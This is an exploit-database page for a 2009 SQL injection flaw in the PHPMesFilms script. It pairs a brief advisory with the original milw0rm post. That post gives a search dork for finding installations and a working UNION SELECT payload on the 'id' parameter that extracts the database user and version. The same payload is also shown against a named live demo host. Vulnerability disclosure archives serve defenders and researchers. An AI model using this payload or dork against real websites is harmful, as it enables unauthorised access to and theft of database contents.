header-logo
Suggest Exploit
vendor:
PHPMesFilms
by:
SuB-ZeRo
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHPMesFilms
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHPMesFilms SQL Injection Vulnerability

A SQL injection vulnerability exists in PHPMesFilms. An attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the back-end database, allowing the attacker to access or modify sensitive data. The vulnerability is due to insufficient sanitization of user-supplied input to the 'id' parameter in the 'index.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

[~] in the name of God
[~]
[~] Download script : http://www.script-masters.com/home/download.php?script=138
[~]
[~]----------------------------------------------------------
[~] Discovered By: SuB-ZeRo(from algeria)   msn: FbH@hotmail.com
[~]
[~] D-unit : SuB-ZeRo & Me!sTer & HaLokA
[~]
[~] Home: www.dz-security.net/ my exploit : www.dz-security.net/subzero
[~]
[~] N0T: We ArE MoUsLiMme WiThE GaZa 4 ever
[~] -----------------------------------------------------------
dork : powered by PhpMesFilms
Exploit:
http://www.sit.com/script/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
---------------------------------------------------------------------------------------------
L!Ve DeMo:
http://phpmesfilms.dyndns.org/demo/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
 not : in this script some times version is 4 and some times is 5 have nice day
[~]----------------------------------------------------------------------
[~] Greetz tO: Me!sTer & HaLoKa & MaXi32 & Dz-TeAm and all algeria & gaza
[~] we are D-unit www.dz-security.net
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-04]

Navigation

Suggest Exploit

Services By CQR